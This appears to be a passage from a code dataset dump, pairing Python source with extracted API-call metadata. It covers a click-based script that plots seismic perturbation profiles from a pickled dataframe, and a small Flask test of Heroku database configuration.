help=\"lat2\")\n@click.option('--dep1', required=True, type=float, help=\"dep1\")\n@click.option('--dep2', required=True, type=float, help=\"dep2\")\n@click.option('--data', required=True, type=str, help=\"the pickle file\")\n@click.option('--parameter', required=True, type=str, help=\"physicial parameter to plot\")\n@click.option('--hnpts', required=True, type=int, help=\"horizontal npts\")\n@click.option('--vnpts', required=True, type=int, help=\"vertical npts\")\ndef main(lon1, lon2, lat1, lat2, dep1, dep2, data, parameter, hnpts, vnpts):\n lon_list = [lon1, lon2]\n lat_list = [lat1, lat2]\n dep_list = [dep1, dep2]\n data_pd_raw = pd.read_pickle(data)\n\n # data_pd is too big\n minlon = min(lon1, lon2)\n maxlon = max(lon1, lon2)\n minlat = min(lat1, lat2)\n maxlat = max(lat1, lat2)\n mindep = min(dep1, dep2)\n maxdep = max(dep1, dep2)\n data_pd = data_pd_raw.loc[(data_pd_raw.lat <= maxlat) & (\n data_pd_raw.lat >= minlat) & (data_pd_raw.lon < maxlon) & (data_pd_raw.lon > minlon) & (data_pd_raw.dep >= mindep) & (data_pd_raw.dep <= maxdep)]\n\n x_mesh, y_mesh, z_mesh, value_mesh = prepare_data(data_pd, parameter)\n lons_plot, lats_plot, deps_plot = generate_vertical_profile_grids(\n lon_list, lat_list, dep_list, hnpts, vnpts)\n values = np.zeros((hnpts, vnpts))\n for ih in range(hnpts):\n for iv in range(vnpts):\n values[ih, iv] = interp_value(\n lats_plot[ih], lons_plot[ih], deps_plot[iv], x_mesh, y_mesh, z_mesh, value_mesh)\n # print(lats_plot[ih], lons_plot[ih], deps_plot[iv], 
values[ih, iv])\n\n # plotting part\n plt.figure()\n mesh_plot_lat, mesh_plot_dep = np.meshgrid(\n lats_plot, deps_plot, indexing=\"ij\")\n\n # get vmin and vmax\n vmin_round = round(np.min(values), 2)\n if(vmin_round < np.min(values)):\n vmin = vmin_round\n else:\n vmin = vmin_round-0.01\n vmax_round = round(np.max(values), 2)\n if(vmax_round > np.max(values)):\n vmax = vmax_round\n else:\n vmax = vmax_round+0.01\n print(vmin, vmax, np.max(values), np.min(values), vmin_round, vmax_round)\n plt.contourf(mesh_plot_lat, mesh_plot_dep,\n values, 101, cmap=plt.cm.seismic_r)\n v = np.arange(vmin, vmax, 0.01)\n plt.colorbar(ticks=v, label=\"perturbation\")\n plt.gca().invert_yaxis()\n plt.xlabel(\n f\"latitude(°) between (lon: {lon1}°, lat: {lat1}°) and (lon: {lon2}°, lat: {lat2}°)\")\n plt.ylabel(\"depth(km)\")\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n"},"apis":{"kind":"list like","value":["matplotlib.pyplot.ylabel","numpy.arange","pandas.read_pickle","matplotlib.pyplot.contourf","click.option","numpy.where","matplotlib.pyplot.xlabel","numpy.max","numpy.linspace","numpy.min","numpy.meshgrid","click.command","matplotlib.pyplot.gca","numba.njit","numpy.deg2rad","numpy.shape","matplotlib.pyplot.show","matplotlib.pyplot.colorbar","numpy.zeros","matplotlib.pyplot.figure","numpy.zeros_like"],"string":"[\n \"matplotlib.pyplot.ylabel\",\n \"numpy.arange\",\n \"pandas.read_pickle\",\n \"matplotlib.pyplot.contourf\",\n \"click.option\",\n \"numpy.where\",\n \"matplotlib.pyplot.xlabel\",\n \"numpy.max\",\n \"numpy.linspace\",\n \"numpy.min\",\n \"numpy.meshgrid\",\n \"click.command\",\n \"matplotlib.pyplot.gca\",\n \"numba.njit\",\n \"numpy.deg2rad\",\n \"numpy.shape\",\n \"matplotlib.pyplot.show\",\n \"matplotlib.pyplot.colorbar\",\n \"numpy.zeros\",\n \"matplotlib.pyplot.figure\",\n \"numpy.zeros_like\"\n]"},"extract_api":{"kind":"string","value":"[((1443, 1455), 'numba.njit', 'numba.njit', ([], {}), '()\\n', (1453, 1455), False, 'import numba\\n'), ((1691, 1703), 'numba.njit', 'numba.njit', ([], {}), '()\\n', (1701, 1703), False, 'import numba\\n'), ((1753, 1765), 'numba.njit', 'numba.njit', ([], {}), '()\\n', (1763, 1765), False, 'import numba\\n'), ((2009, 2021), 'numba.njit', 'numba.njit', ([], {}), '()\\n', (2019, 2021), False, 'import numba\\n'), ((2636, 2651), 'click.command', 'click.command', ([], {}), '()\\n', (2649, 2651), False, 'import click\\n'), ((2653, 2715), 'click.option', 'click.option', (['\"\"\"--lon1\"\"\"'], {'required': '(True)', 'type': 'float', 'help': '\"\"\"lon1\"\"\"'}), \"('--lon1', required=True, type=float, help='lon1')\\n\", (2665, 2715), False, 'import click\\n'), ((2717, 2779), 'click.option', 'click.option', (['\"\"\"--lon2\"\"\"'], {'required': '(True)', 'type': 'float', 'help': '\"\"\"lon2\"\"\"'}), \"('--lon2', required=True, type=float, help='lon2')\\n\", (2729, 2779), False, 'import click\\n'), ((2781, 2843), 'click.option', 'click.option', (['\"\"\"--lat1\"\"\"'], {'required': '(True)', 'type': 'float', 'help': '\"\"\"lat1\"\"\"'}), \"('--lat1', required=True, type=float, help='lat1')\\n\", (2793, 2843), False, 'import click\\n'), ((2845, 2907), 'click.option', 'click.option', (['\"\"\"--lat2\"\"\"'], {'required': '(True)', 'type': 'float', 'help': '\"\"\"lat2\"\"\"'}), \"('--lat2', required=True, type=float, help='lat2')\\n\", (2857, 2907), False, 'import click\\n'), ((2909, 2971), 'click.option', 'click.option', (['\"\"\"--dep1\"\"\"'], {'required': '(True)', 'type': 'float', 'help': '\"\"\"dep1\"\"\"'}), \"('--dep1', required=True, type=float, 
help='dep1')\\n\", (2921, 2971), False, 'import click\\n'), ((2973, 3035), 'click.option', 'click.option', (['\"\"\"--dep2\"\"\"'], {'required': '(True)', 'type': 'float', 'help': '\"\"\"dep2\"\"\"'}), \"('--dep2', required=True, type=float, help='dep2')\\n\", (2985, 3035), False, 'import click\\n'), ((3037, 3108), 'click.option', 'click.option', (['\"\"\"--data\"\"\"'], {'required': '(True)', 'type': 'str', 'help': '\"\"\"the pickle file\"\"\"'}), \"('--data', required=True, type=str, help='the pickle file')\\n\", (3049, 3108), False, 'import click\\n'), ((3110, 3203), 'click.option', 'click.option', (['\"\"\"--parameter\"\"\"'], {'required': '(True)', 'type': 'str', 'help': '\"\"\"physicial parameter to plot\"\"\"'}), \"('--parameter', required=True, type=str, help=\\n 'physicial parameter to plot')\\n\", (3122, 3203), False, 'import click\\n'), ((3200, 3272), 'click.option', 'click.option', (['\"\"\"--hnpts\"\"\"'], {'required': '(True)', 'type': 'int', 'help': '\"\"\"horizontal npts\"\"\"'}), \"('--hnpts', required=True, type=int, help='horizontal npts')\\n\", (3212, 3272), False, 'import click\\n'), ((3274, 3344), 'click.option', 'click.option', (['\"\"\"--vnpts\"\"\"'], {'required': '(True)', 'type': 'int', 'help': '\"\"\"vertical npts\"\"\"'}), \"('--vnpts', required=True, type=int, help='vertical npts')\\n\", (3286, 3344), False, 'import click\\n'), ((369, 425), 'numpy.meshgrid', 'np.meshgrid', (['lon_list', 'lat_list', 'dep_list'], {'indexing': '\"\"\"ij\"\"\"'}), \"(lon_list, lat_list, dep_list, indexing='ij')\\n\", (380, 425), True, 'import numpy as np\\n'), ((452, 470), 'numpy.shape', 'np.shape', (['lon_mesh'], {}), '(lon_mesh)\\n', (460, 470), True, 'import numpy as np\\n'), ((488, 511), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\\n', (501, 511), True, 'import numpy as np\\n'), ((525, 548), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\\n', (538, 548), True, 'import numpy as np\\n'), ((562, 585), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\\n', (575, 585), True, 'import numpy as np\\n'), ((599, 622), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\\n', (612, 622), True, 'import numpy as np\\n'), ((636, 659), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\\n', (649, 659), True, 'import numpy as np\\n'), ((2209, 2226), 'numpy.min', 'np.min', (['distance2'], {}), '(distance2)\\n', (2215, 2226), True, 'import numpy as np\\n'), ((2239, 2274), 'numpy.where', 'np.where', (['(distance2 == mindistance2)'], {}), '(distance2 == mindistance2)\\n', (2247, 2274), True, 'import numpy as np\\n'), ((2448, 2492), 'numpy.linspace', 'np.linspace', (['lon_list[0]', 'lon_list[1]', 'hnpts'], {}), '(lon_list[0], lon_list[1], hnpts)\\n', (2459, 2492), True, 'import numpy as np\\n'), ((2504, 2548), 'numpy.linspace', 'np.linspace', (['lat_list[0]', 'lat_list[1]', 'hnpts'], {}), '(lat_list[0], lat_list[1], hnpts)\\n', (2515, 2548), True, 'import numpy as np\\n'), ((2560, 2604), 'numpy.linspace', 'np.linspace', (['dep_list[0]', 'dep_list[1]', 'vnpts'], {}), '(dep_list[0], dep_list[1], vnpts)\\n', (2571, 2604), True, 'import numpy as np\\n'), ((3524, 3544), 'pandas.read_pickle', 'pd.read_pickle', (['data'], {}), '(data)\\n', (3538, 3544), True, 'import pandas as pd\\n'), ((4172, 4196), 'numpy.zeros', 'np.zeros', (['(hnpts, vnpts)'], {}), '((hnpts, vnpts))\\n', (4180, 4196), True, 'import numpy as np\\n'), ((4503, 4515), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\\n', (4513, 
4515), True, 'import matplotlib.pyplot as plt\\n'), ((4551, 4599), 'numpy.meshgrid', 'np.meshgrid', (['lats_plot', 'deps_plot'], {'indexing': '\"\"\"ij\"\"\"'}), \"(lats_plot, deps_plot, indexing='ij')\\n\", (4562, 4599), True, 'import numpy as np\\n'), ((5009, 5087), 'matplotlib.pyplot.contourf', 'plt.contourf', (['mesh_plot_lat', 'mesh_plot_dep', 'values', '(101)'], {'cmap': 'plt.cm.seismic_r'}), '(mesh_plot_lat, mesh_plot_dep, values, 101, cmap=plt.cm.seismic_r)\\n', (5021, 5087), True, 'import matplotlib.pyplot as plt\\n'), ((5114, 5141), 'numpy.arange', 'np.arange', (['vmin', 'vmax', '(0.01)'], {}), '(vmin, vmax, 0.01)\\n', (5123, 5141), True, 'import numpy as np\\n'), ((5146, 5189), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {'ticks': 'v', 'label': '\"\"\"perturbation\"\"\"'}), \"(ticks=v, label='perturbation')\\n\", (5158, 5189), True, 'import matplotlib.pyplot as plt\\n'), ((5223, 5329), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['f\"\"\"latitude(°) between (lon: {lon1}°, lat: {lat1}°) and (lon: {lon2}°, lat: {lat2}°)\"\"\"'], {}), \"(\\n f'latitude(°) between (lon: {lon1}°, lat: {lat1}°) and (lon: {lon2}°, lat: {lat2}°)'\\n )\\n\", (5233, 5329), True, 'import matplotlib.pyplot as plt\\n'), ((5333, 5356), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['\"\"\"depth(km)\"\"\"'], {}), \"('depth(km)')\\n\", (5343, 5356), True, 'import matplotlib.pyplot as plt\\n'), ((5361, 5371), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\\n', (5369, 5371), True, 'import matplotlib.pyplot as plt\\n'), ((1735, 1748), 'numpy.deg2rad', 'np.deg2rad', (['x'], {}), '(x)\\n', (1745, 1748), True, 'import numpy as np\\n'), ((1797, 1810), 'numpy.deg2rad', 'np.deg2rad', (['x'], {}), '(x)\\n', (1807, 1810), True, 'import numpy as np\\n'), ((4658, 4672), 'numpy.min', 'np.min', (['values'], {}), '(values)\\n', (4664, 4672), True, 'import numpy as np\\n'), ((4697, 4711), 'numpy.min', 'np.min', (['values'], {}), '(values)\\n', (4703, 4711), True, 'import numpy as np\\n'), ((4804, 4818), 'numpy.max', 'np.max', (['values'], {}), '(values)\\n', (4810, 4818), True, 'import numpy as np\\n'), ((4843, 4857), 'numpy.max', 'np.max', (['values'], {}), '(values)\\n', (4849, 4857), True, 'import numpy as np\\n'), ((4949, 4963), 'numpy.max', 'np.max', (['values'], {}), '(values)\\n', (4955, 4963), True, 'import numpy as np\\n'), ((4965, 4979), 'numpy.min', 'np.min', (['values'], {}), '(values)\\n', (4971, 4979), True, 'import numpy as np\\n'), ((5194, 5203), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (5201, 5203), True, 'import matplotlib.pyplot as plt\\n')]"}}},{"rowIdx":799,"cells":{"code":{"kind":"string","value":"from flask import Flask\nfrom flask_appconfig import HerokuConfig\n\n\ndef create_sample_app():\n app = Flask('testapp')\n HerokuConfig(app)\n return app\n\n\ndef test_herokupostgres(monkeypatch):\n monkeypatch.setenv('HEROKU_POSTGRESQL_ORANGE_URL', 'heroku-db-uri')\n\n app = create_sample_app()\n assert app.config['SQLALCHEMY_DATABASE_URI'] == 'heroku-db-uri'\n"},"apis":{"kind":"list like","value":["flask_appconfig.HerokuConfig","flask.Flask"],"string":"[\n \"flask_appconfig.HerokuConfig\",\n \"flask.Flask\"\n]"},"extract_api":{"kind":"string","value":"[((102, 118), 'flask.Flask', 'Flask', (['\"\"\"testapp\"\"\"'], {}), \"('testapp')\\n\", (107, 118), False, 'from flask import Flask\\n'), ((123, 140), 'flask_appconfig.HerokuConfig', 'HerokuConfig', (['app'], {}), '(app)\\n', (135, 140), False, 'from flask_appconfig import 
HerokuConfig\\n')]"}}}],"truncated":false,"partial":false},"paginationData":{"pageIndex":7,"numItemsPerPage":100,"numTotalItems":4772871,"offset":700,"length":100}},"jwt":"eyJhbGciOiJFZERTQSJ9.eyJyZWFkIjp0cnVlLCJwZXJtaXNzaW9ucyI6eyJyZXBvLmNvbnRlbnQucmVhZCI6dHJ1ZX0sImlhdCI6MTc2NTUwMDI1NCwic3ViIjoiL2RhdGFzZXRzL2x1bmEtY29kZS9zdGFyY29kZXJkYXRhLWFwaXMiLCJleHAiOjE3NjU1MDM4NTQsImlzcyI6Imh0dHBzOi8vaHVnZ2luZ2ZhY2UuY28ifQ.nNBxsHtOA3QpnlFisPVIoG_DkVJRTjJcHypFbBt-JqwHwwE4uy81Hwc4a4bkPMHhQLEzxi7CZUzExpbymhJ6Dg","displayUrls":true,"splitSizeSummaries":[{"config":"default","split":"train","numRows":4772871,"numBytesParquet":13555618994}]},"discussionsStats":{"closed":0,"open":0,"total":0},"fullWidth":true,"hasGatedAccess":true,"hasFullAccess":true,"isEmbedded":false,"savedQueries":{"community":[],"user":[]}}">
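Each row above pairs a source file ("code") with the fully-qualified APIs it uses ("apis") and an "extract_api" string holding one tuple per call site. Judging from the tuples shown — the field order here is an inference from the data itself, not a documented schema — a tuple appears to carry the character span of the call, the qualified API name, the name as written in the code, the literal positional and keyword arguments, the matched call text, a narrower span, a flag that seems to mark aliased imports, and the import statement that provides the API. A minimal sketch of reading one such value back, assuming it is the printable Python literal it appears to be:

import ast

# Hypothetical single-entry value, shaped like the flask_appconfig row above;
# field meanings are inferred from the data, not from any documented schema.
row_extract_api = (
    "[((102, 118), 'flask.Flask', 'Flask', (['\"testapp\"'], {}), "
    "\"('testapp')\", (107, 118), False, 'from flask import Flask')]"
)

entries = ast.literal_eval(row_extract_api)  # the value parses as a Python-literal list of tuples
for entry in entries:
    start, end = entry[0]        # character span of the call inside "code"
    qualified_name = entry[1]    # fully-qualified API name
    import_stmt = entry[-1]      # import that makes the call available
    print(f"{qualified_name} at chars {start}-{end}; requires {import_stmt!r}")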
code
stringlengths
22
1.05M
apis
listlengths
1
3.31k
extract_api
stringlengths
75
3.25M
from adafruit_circuitplayground.express import cpx # Main loop gets x, y and z axis acceleration, prints the values, and turns on # red, green and blue, at levels related to the x, y and z values. while True: if cpx.switch: print("Slide switch off!") cpx.pixels.fill((0, 0, 0)) continue else: R = 0 G = 0 B = 0 x, y, z = cpx.acceleration print((x, y, z)) if x: R = R + abs(int(x)) if y: G = G + abs(int(y)) if z: B = B + abs(int(z)) cpx.pixels.fill((R, G, B))
[ "adafruit_circuitplayground.express.cpx.pixels.fill" ]
[((272, 298), 'adafruit_circuitplayground.express.cpx.pixels.fill', 'cpx.pixels.fill', (['(0, 0, 0)'], {}), '((0, 0, 0))\n', (287, 298), False, 'from adafruit_circuitplayground.express import cpx\n'), ((574, 600), 'adafruit_circuitplayground.express.cpx.pixels.fill', 'cpx.pixels.fill', (['(R, G, B)'], {}), '((R, G, B))\n', (589, 600), False, 'from adafruit_circuitplayground.express import cpx\n')]
import os os.environ.setdefault("DJANGO_SETTINGS_MODULE", "hello_world.settings") # django WSGI application from django.core.wsgi import get_wsgi_application application = get_wsgi_application() # load SnapSearch API credentials api_email = "<email>" api_key = "<key>" # initialize the interceptor from SnapSearch import Client, Detector, Interceptor interceptor = Interceptor(Client(api_email, api_key), Detector()) # deploy the interceptor from SnapSearch.wsgi import InterceptorMiddleware application = InterceptorMiddleware(application, interceptor)
[ "os.environ.setdefault", "django.core.wsgi.get_wsgi_application", "SnapSearch.wsgi.InterceptorMiddleware", "SnapSearch.Client", "SnapSearch.Detector" ]
[((11, 82), 'os.environ.setdefault', 'os.environ.setdefault', (['"""DJANGO_SETTINGS_MODULE"""', '"""hello_world.settings"""'], {}), "('DJANGO_SETTINGS_MODULE', 'hello_world.settings')\n", (32, 82), False, 'import os\n'), ((174, 196), 'django.core.wsgi.get_wsgi_application', 'get_wsgi_application', ([], {}), '()\n', (194, 196), False, 'from django.core.wsgi import get_wsgi_application\n'), ((511, 558), 'SnapSearch.wsgi.InterceptorMiddleware', 'InterceptorMiddleware', (['application', 'interceptor'], {}), '(application, interceptor)\n', (532, 558), False, 'from SnapSearch.wsgi import InterceptorMiddleware\n'), ((381, 407), 'SnapSearch.Client', 'Client', (['api_email', 'api_key'], {}), '(api_email, api_key)\n', (387, 407), False, 'from SnapSearch import Client, Detector, Interceptor\n'), ((409, 419), 'SnapSearch.Detector', 'Detector', ([], {}), '()\n', (417, 419), False, 'from SnapSearch import Client, Detector, Interceptor\n')]
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2021 Lenovo # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import glob import os import shutil import tempfile import confluent.sshutil as sshutil import confluent.util as util import confluent.noderange as noderange import eventlet import pwd import grp def mkdirp(path): try: os.makedirs(path) except OSError as e: if e.errno != 17: raise def get_entries(filename): secname = 'REPLACE:' filename = filename.strip() if filename[-1] == '>': filename = filename[:-1] with open(filename, 'r') as slfile: slist = slfile.read() entries = slist.split('\n') for ent in entries: ent = ent.split('#', 1)[0].strip() if not ent: continue if ent in ('APPENDONCE:', 'MERGE:', 'REPLACE:'): secname = ent if ent[0] == '<': subfilename = ent[1:] if subfilename[-1] == '>': subfilename = subfilename[:-1] if subfilename[0] != '/': subfilename = os.path.join(os.path.dirname(filename), subfilename) for subent in get_entries(subfilename): yield subent yield secname else: yield ent class SyncList(object): def __init__(self, filename, nodename, cfg): slist = None self.replacemap = {} self.appendmap = {} self.appendoncemap = {} self.mergemap = {} self.optmap = {} entries = get_entries(filename) currmap = self.replacemap for ent in entries: try: cmtidx = ent.index('#') ent = ent[:cmtidx] except ValueError: pass for special in '$%^&|{}': if special in ent: raise Exception( 'Special character "{}" reserved for future use'.format(special)) ent = ent.strip() if not ent: continue if ent[-1] == ':': if ent == 'MERGE:': currmap = self.mergemap elif ent == 'APPENDONCE:': currmap = self.appendoncemap elif ent == 'REPLACE:': currmap = self.replacemap else: raise Exception( 'Section "{}" is not currently supported in syncfiles'.format(ent[:-1])) continue if '->' in ent: k, v = ent.split('->') k = k.strip() v = v.strip() if ':' in v: nr, v = v.split(':', 1) for candidate in noderange.NodeRange(nr, cfg).nodes: if candidate == nodename: break else: continue optparts = v.split() v = optparts[0] optparts = optparts[1:] else: kparts = [] optparts = [] currparts = kparts for part in ent.split(): if part[0] == '(': currparts = optparts currparts.append(part) k = ' '.join(kparts) v = None entopts = {} if optparts: if optparts[0][0] != '(' or optparts[-1][-1] != ')': raise Exception("Unsupported syntax in syncfile: " + ent) opts = ','.join(optparts) opts = opts[1:-1] for opt in opts.split(','): optname, optval = opt.split('=') if optname == 'owner': try: uid = pwd.getpwnam(optval).pw_uid except KeyError: uid = None optval = {'name': optval, 'id': uid} elif optname == 'group': try: gid = grp.getgrnam(optval).gr_gid except KeyError: gid = None optval = {'name': optval, 'id': gid} entopts[optname] = optval currmap[k] = v targ = v if v else k for f in targ.split(): self.optmap[f] = entopts def sync_list_to_node(sl, node, suffixes): targdir = tempfile.mkdtemp('.syncto{}'.format(node)) output = '' try: for ent in sl.replacemap: stage_ent(sl.replacemap, ent, targdir) if 'append' in suffixes: while 
suffixes['append'] and suffixes['append'][0] == '/': suffixes['append'] = suffixes['append'][1:] for ent in sl.appendmap: stage_ent(sl.appendmap, ent, os.path.join(targdir, suffixes['append'])) if 'merge' in suffixes: while suffixes['merge'] and suffixes['merge'][0] == '/': suffixes['merge'] = suffixes['merge'][1:] for ent in sl.mergemap: stage_ent(sl.mergemap, ent, os.path.join(targdir, suffixes['merge']), True) if 'appendonce' in suffixes: while suffixes['appendonce'] and suffixes['appendonce'][0] == '/': suffixes['appendonce'] = suffixes['appendonce'][1:] for ent in sl.appendoncemap: stage_ent(sl.appendoncemap, ent, os.path.join(targdir, suffixes['appendonce']), True) sshutil.prep_ssh_key('/etc/confluent/ssh/automation') output = util.run( ['rsync', '-rvLD', targdir + '/', 'root@{}:/'.format(node)])[0] except Exception as e: if 'CalledProcessError' not in repr(e): # https://github.com/eventlet/eventlet/issues/413 # for some reason, can't catch the calledprocesserror normally # for this exception, implement a hack workaround raise unreadablefiles = [] for root, dirnames, filenames in os.walk(targdir): for filename in filenames: filename = os.path.join(root, filename) try: with open(filename, 'r') as _: pass except OSError as e: unreadablefiles.append(filename.replace(targdir, '')) if unreadablefiles: raise Exception("Syncing failed due to unreadable files: " + ','.join(unreadablefiles)) else: raise finally: shutil.rmtree(targdir) if not isinstance(output, str): output = output.decode('utf8') retval = { 'options': sl.optmap, 'output': output, } return retval # need dictionary with output and options def stage_ent(currmap, ent, targdir, appendexist=False): dst = currmap[ent] everyfent = [] allfents = ent.split() for tmpent in allfents: fents = glob.glob(tmpent) everyfent.extend(fents) if not everyfent: raise Exception('No matching files for "{}"'.format(ent)) if dst is None: # this is to indicate source and destination as one dst = os.path.dirname(everyfent[0]) + '/' while dst and dst[0] == '/': dst = dst[1:] if len(everyfent) > 1 and dst[-1] != '/': raise Exception( 'Multiple files match {}, {} needs a trailing slash to indicate a directory'.format(ent, dst)) fulltarg = os.path.join(targdir, dst) for targ in everyfent: mkpathorlink(targ, fulltarg, appendexist) def mkpathorlink(source, destination, appendexist=False): if os.path.isdir(source): mkdirp(destination) for ent in os.listdir(source): currsrc = os.path.join(source, ent) currdst = os.path.join(destination, ent) mkpathorlink(currsrc, currdst) else: if destination[-1] == '/': mkdirp(destination) destination = os.path.join(destination, os.path.basename(source)) else: mkdirp(os.path.dirname(destination)) if appendexist and os.path.exists(destination): tmpnam = tempfile.mktemp() shutil.copy(destination, tmpnam) os.remove(destination) with open(destination, 'w') as realdest: with open(tmpnam) as olddest: realdest.write(olddest.read()) with open(source) as sourcedata: realdest.write(sourcedata.read()) os.remove(tmpnam) else: os.symlink(source, destination) syncrunners = {} def start_syncfiles(nodename, cfg, suffixes): deployinfo = cfg.get_node_attributes( nodename, ('deployment.*',)) deployinfo = deployinfo.get(nodename, {}) profile = deployinfo.get( 'deployment.pendingprofile', {}).get('value', '') if not profile: profile = deployinfo.get( 'deployment.stagedprofile', {}).get('value', '') if not profile: profile = deployinfo.get( 'deployment.profile', {}).get('value', '') if not profile: raise Exception('Cannot perform syncfiles without 
profile assigned') synclist = '/var/lib/confluent/public/os/{}/syncfiles'.format(profile) if not os.path.exists(synclist): return '200 OK' # not running sl = SyncList(synclist, nodename, cfg) if not (sl.appendmap or sl.mergemap or sl.replacemap or sl.appendoncemap): return '200 OK' # the synclist has no actual entries syncrunners[nodename] = eventlet.spawn( sync_list_to_node, sl, nodename, suffixes) return '202 Queued' # backgrounded def get_syncresult(nodename): if nodename not in syncrunners: return ('204 Not Running', '') if not syncrunners[nodename].dead: return ('200 OK', '') result = syncrunners[nodename].wait() del syncrunners[nodename] return ('200 OK', result)
[ "os.walk", "os.remove", "os.path.exists", "os.listdir", "pwd.getpwnam", "os.path.isdir", "glob.glob", "confluent.sshutil.prep_ssh_key", "os.path.dirname", "shutil.copy", "confluent.noderange.NodeRange", "grp.getgrnam", "os.makedirs", "eventlet.spawn", "os.path.join", "os.symlink", "tempfile.mktemp", "os.path.basename", "shutil.rmtree" ]
[((8126, 8152), 'os.path.join', 'os.path.join', (['targdir', 'dst'], {}), '(targdir, dst)\n', (8138, 8152), False, 'import os\n'), ((8296, 8317), 'os.path.isdir', 'os.path.isdir', (['source'], {}), '(source)\n', (8309, 8317), False, 'import os\n'), ((10220, 10277), 'eventlet.spawn', 'eventlet.spawn', (['sync_list_to_node', 'sl', 'nodename', 'suffixes'], {}), '(sync_list_to_node, sl, nodename, suffixes)\n', (10234, 10277), False, 'import eventlet\n'), ((848, 865), 'os.makedirs', 'os.makedirs', (['path'], {}), '(path)\n', (859, 865), False, 'import os\n'), ((6186, 6239), 'confluent.sshutil.prep_ssh_key', 'sshutil.prep_ssh_key', (['"""/etc/confluent/ssh/automation"""'], {}), "('/etc/confluent/ssh/automation')\n", (6206, 6239), True, 'import confluent.sshutil as sshutil\n'), ((7211, 7233), 'shutil.rmtree', 'shutil.rmtree', (['targdir'], {}), '(targdir)\n', (7224, 7233), False, 'import shutil\n'), ((7617, 7634), 'glob.glob', 'glob.glob', (['tmpent'], {}), '(tmpent)\n', (7626, 7634), False, 'import glob\n'), ((8366, 8384), 'os.listdir', 'os.listdir', (['source'], {}), '(source)\n', (8376, 8384), False, 'import os\n'), ((9943, 9967), 'os.path.exists', 'os.path.exists', (['synclist'], {}), '(synclist)\n', (9957, 9967), False, 'import os\n'), ((6705, 6721), 'os.walk', 'os.walk', (['targdir'], {}), '(targdir)\n', (6712, 6721), False, 'import os\n'), ((7842, 7871), 'os.path.dirname', 'os.path.dirname', (['everyfent[0]'], {}), '(everyfent[0])\n', (7857, 7871), False, 'import os\n'), ((8408, 8433), 'os.path.join', 'os.path.join', (['source', 'ent'], {}), '(source, ent)\n', (8420, 8433), False, 'import os\n'), ((8456, 8486), 'os.path.join', 'os.path.join', (['destination', 'ent'], {}), '(destination, ent)\n', (8468, 8486), False, 'import os\n'), ((8775, 8802), 'os.path.exists', 'os.path.exists', (['destination'], {}), '(destination)\n', (8789, 8802), False, 'import os\n'), ((8825, 8842), 'tempfile.mktemp', 'tempfile.mktemp', ([], {}), '()\n', (8840, 8842), False, 'import tempfile\n'), ((8855, 8887), 'shutil.copy', 'shutil.copy', (['destination', 'tmpnam'], {}), '(destination, tmpnam)\n', (8866, 8887), False, 'import shutil\n'), ((8900, 8922), 'os.remove', 'os.remove', (['destination'], {}), '(destination)\n', (8909, 8922), False, 'import os\n'), ((9188, 9205), 'os.remove', 'os.remove', (['tmpnam'], {}), '(tmpnam)\n', (9197, 9205), False, 'import os\n'), ((9232, 9263), 'os.symlink', 'os.symlink', (['source', 'destination'], {}), '(source, destination)\n', (9242, 9263), False, 'import os\n'), ((8659, 8683), 'os.path.basename', 'os.path.basename', (['source'], {}), '(source)\n', (8675, 8683), False, 'import os\n'), ((8718, 8746), 'os.path.dirname', 'os.path.dirname', (['destination'], {}), '(destination)\n', (8733, 8746), False, 'import os\n'), ((1601, 1626), 'os.path.dirname', 'os.path.dirname', (['filename'], {}), '(filename)\n', (1616, 1626), False, 'import os\n'), ((5469, 5510), 'os.path.join', 'os.path.join', (['targdir', "suffixes['append']"], {}), "(targdir, suffixes['append'])\n", (5481, 5510), False, 'import os\n'), ((5777, 5817), 'os.path.join', 'os.path.join', (['targdir', "suffixes['merge']"], {}), "(targdir, suffixes['merge'])\n", (5789, 5817), False, 'import os\n'), ((6125, 6170), 'os.path.join', 'os.path.join', (['targdir', "suffixes['appendonce']"], {}), "(targdir, suffixes['appendonce'])\n", (6137, 6170), False, 'import os\n'), ((6789, 6817), 'os.path.join', 'os.path.join', (['root', 'filename'], {}), '(root, filename)\n', (6801, 6817), False, 'import os\n'), ((3252, 3280), 
'confluent.noderange.NodeRange', 'noderange.NodeRange', (['nr', 'cfg'], {}), '(nr, cfg)\n', (3271, 3280), True, 'import confluent.noderange as noderange\n'), ((4357, 4377), 'pwd.getpwnam', 'pwd.getpwnam', (['optval'], {}), '(optval)\n', (4369, 4377), False, 'import pwd\n'), ((4634, 4654), 'grp.getgrnam', 'grp.getgrnam', (['optval'], {}), '(optval)\n', (4646, 4654), False, 'import grp\n')]
import json import os from argparse import ArgumentTypeError from eth_typing import Address from web3.contract import Contract from settings import MIN_VAL, MAX_VAL, DEPLOYED_CONTRACTS, CONFIG_DIR async def init_simulation(contracts: [], factor: float, fn: str, status_init: bool) -> bool: statuses = [True] try: if status_init: for c in contracts: # Use different cloud_addresses for each contract instance cloud_address, cloud_status_ok = await c.cloud_sla_creation_activation() c.set_cloud_sla_address(cloud_address) statuses.append(cloud_status_ok) if fn == 'read' or fn == 'read_deny_lost_file_check' or fn == 'file_check_undeleted_file': statuses.append(await c.upload()) if fn == 'file_check_undeleted_file': statuses.append(await c.read()) if fn == 'corrupted_file_check': statuses.append(await c.another_file_upload_read()) if fn == 'delete': for _ in range(round(factor / DEPLOYED_CONTRACTS) + 1): statuses.append(await c.upload()) else: for c in contracts: if fn == 'delete': if c.tx_upload_count < round(factor / 